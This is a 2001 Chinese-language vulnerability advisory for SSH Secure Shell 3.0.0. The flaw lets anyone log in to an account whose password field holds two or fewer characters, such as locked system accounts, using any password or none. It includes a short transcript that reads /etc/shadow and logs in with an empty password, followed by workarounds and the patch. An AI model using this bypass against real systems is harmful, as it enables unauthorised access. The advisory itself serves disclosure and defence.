发布日期：2001-07-20
更新日期：2001-07-23

受影响系统：

SSH Secure Shell 3.0.0
- Red Hat Linux 6.1
- Red Hat Linux 6.2
- Red Hat Linux 7.0
- Red Hat Linux 7.1
- Sun Solaris 2.6
- Sun Solaris 2.7
- Sun Solaris 8
- HP-UX 10.20
- HP-UX 11.00
- Caldera Linux 2.4
- Suse Linux 6.4
- Suse Linux 7.0

不受影响系统：

SSH Secure Shell 3.0.1
SSH Secure Shell 2.x
SSH Secure Shell 1.2.x

描述：

---

SSH Secure Shell 3.0.0存在一个远程安全漏洞。如果某个帐号的口令域中只包含两个
或者更少的字符，远程攻击者就可以使用任何口令包括空口令登录进入这些帐号。

很多Unix系统有一些缺省的锁定帐号。例如Solaris,很多管理帐号"lp"，"adm","bin"等
在/etc/shadow文件中的口令域为"NP"。在一些Linux系统中，一些锁定帐号的口令域为"!!".
如果这些系统正在使用SSH 3.0.0，那么攻击者就可能远程登录进入系统。潜在地可能获取
root权限。

<*来源：Stephanie Thomas (customer.service@ssh.com) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Golden_Eternity (bhodi@bigfoot.com)提供了如下测试代码：

[root@shiva /root]# cat /etc/shadow | grep "postgres"
postgres:!!:11515:0:99999:7:::
[root@shiva /root]# ssh -l postgres localhost
postgres's password: <Null Password Entered>
Authentication successful.
Last login: Sat Jul 21 2001 09:09:21 -0700 from localhost
bash$ logout
Connection to localhost closed.



建议：

---

临时解决方法：

1. 禁止使用口令认证，使用公钥认证方式
2. 只允许口令长度超过2个字符的用户登录，这可以通过在/etc/ssh2/sshd2_config中设置
   AllowUsers, AllowGroups, DenyUsers, 和DenyGroups关键字实现
3. 为每个锁定帐号分配一个足够强度的口令
4. 换用ssh 2.x

厂商补丁：

SSH Secure Shell 3.0.1已经修复了这个问题。
我们建议正在使用ssh 3.0.0的用户尽快升级到最新版本。
您可以在下列地址下载：
ftp://ftp.ssh.com/pub/ssh
或
http://commerce.ssh.com




浏览次数：7023
严重程度：0（网友投票）